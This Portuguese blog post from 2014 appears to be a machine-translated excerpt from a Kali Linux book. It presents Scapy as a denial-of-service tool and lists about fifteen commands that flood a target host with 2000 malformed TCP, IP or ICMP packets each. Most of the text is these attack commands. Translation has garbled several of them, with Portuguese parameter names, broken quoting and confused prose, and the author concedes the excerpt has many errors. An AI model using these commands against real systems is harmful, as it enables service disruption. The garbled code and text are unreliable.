Scapy
Uma das ferramentas mais populares é DoS scapy. Scapy é uma ferramenta de manipulação de pacotes para redes de computadores, escrito em Python por Philippe Biondi.
Scapy pode forjar ou decodificar pacotes, enviá-los no fio, capturá-los, e as solicitações e as respostas de jogo. Além disso, ele pode lidar com tarefas como digitalização, tracerouting, sondagem, testes de unidade, ataques, e
a descoberta de rede.
Um truque comum é manipular pacotes TCP do Kali e enviá-lo via scapy.
Para iniciar scapy, tipo scapy na janela do terminal. Uma vez scapy foi lançado,
digitar sintaxe de comando:
Nesta tela a seguir, vamos usar scapy para enviar TCP malformado
pacotes para o nosso servidor de teste. Neste caso de uso, o nosso servidor de teste é 10.0.0.1. Este pode ser um roteador ou um servidor web. Também, vamos especificar o número de pacotes que serão enviar para o nosso destino. Neste caso estamos enviando 2000 pacotes usando o comando:
send (IP (dst = "10.0.0.1", ttl = 0) / TCP (), iface = "eth0", count = 2000)
Na linha de comando anterior, estamos enviando 2000 pacotes a partir de nossa eth0 interface em nosso servidor Kali para o endereço de destino 10.0.0.1. Além disso, estamos enviando o alvo de um tempo para viver valor de 0. Isso é muito bonito impossível de um TCP ponto de vista.
Essencialmente, estamos tentando confundir o servidor web com um mau TTL valor. Atacantes na vida real mandar milhões desses pacotes. Deve notar-se que um sistema sob as circunstâncias corretas pode falhar ou se tornar corruptos de uma única má ou pacote malformado. Podemos ajustar a contagem ou outros parâmetros que podem precisar de para o nosso ataque:
Aqui estão alguns outros cenários de ataque populares usados por scapy:
Bad IP versão
send (IP (dst = "10.0.0.1", src = "10.20.30.40", versão = 0) /
TCP (dport = "www"), iface = "eth0", count = 2000)
Bad TCP checksum
send (IP (dst = "10.0.0.1") / TCP (chksum = 0x5555), iface = "eth0", count = 2000)
Bad TCP Flags (tudo esclarecido e SEQ # == 0)
send (IP (dst = "10.0.0.1") / TCP (flags = "", seq = 555), iface = "eth0",
count = 2000)
Bandeiras Bad TCP (All Flags Set)
send (IP (dst = "10.0.0.1") / TCP (flags = 0x0ff), iface = "eth0", count = 2000)
FIN único conjunto
send (IP (dst = "10.0.0.1") / TCP (flags = "F"), iface = "eth0", count = 2000)
Length> L2 Comprimento
send (IP (dst = "10.0.0.1", src = "10.20.30.40", o DIH = 15L) / TCP (dport = "www"), iface = "eth0", count = 2000)
Comprimento Header Too Short
send (IP (dst = "10.0.0.1", src = "10.20.30.40", o DIH = 2L) / TCP (dport = "www"), iface = "eth0", count = 2000)
ICMP Flood
send (IP (dst = "10.0.0.1") / ICMP (), iface = "eth0", count = 2000)
IP erro de checksum
send (IP (dst = "10.0.0.1", src = "10.20.30.40", chksum = 0x5500) / TCP (dport = "www"), iface = "eth0", count = 2000)
IP Fragment
send (IP (dst = "10.0.0.1", src = "10.20.30.40", frag = 1) / TCP (dport = "www"),iface = "eth0", count = 2000)
IP Comprimento> L2 Comprimento
send (IP (dst = "10.0.0.1", src = "10.20.30.40", o DIH = 5L, len = 80) /
TCP (dport = "www"), iface = "eth0", count = 2000)
Fonte endereço IP == Destination Address
send (IP (dst = "10.0.0.1", src = "10.0.0.1") / TCP (dport = "www"),
iface = "eth0", count = 2000)
L2 Comprimento >> IP Comprimento
send (IP (dst = "10.0.0.1", len = 32) / Raw (load = "bla-bla-bla-bla-bla-bla-
bla-bla "), iface =" eth0 ", count = 2000)
No L4
send (IP (dst = "10.0.0.1", src = "10.20.30.40"), iface = "eth0," count = 2000)
SYN && FIN Set
enviar (IP (dst = "10.0.0.1") / TCP (flags = "FS"), iface = "eth0", count = 2000)
Pedaço retirado do livro kali linux tem muitas coisas erradas assim que quiser conserto
segunda-feira, 10 de março de 2014
Assinar:
Postar comentários (Atom)
0 comentários:
Postar um comentário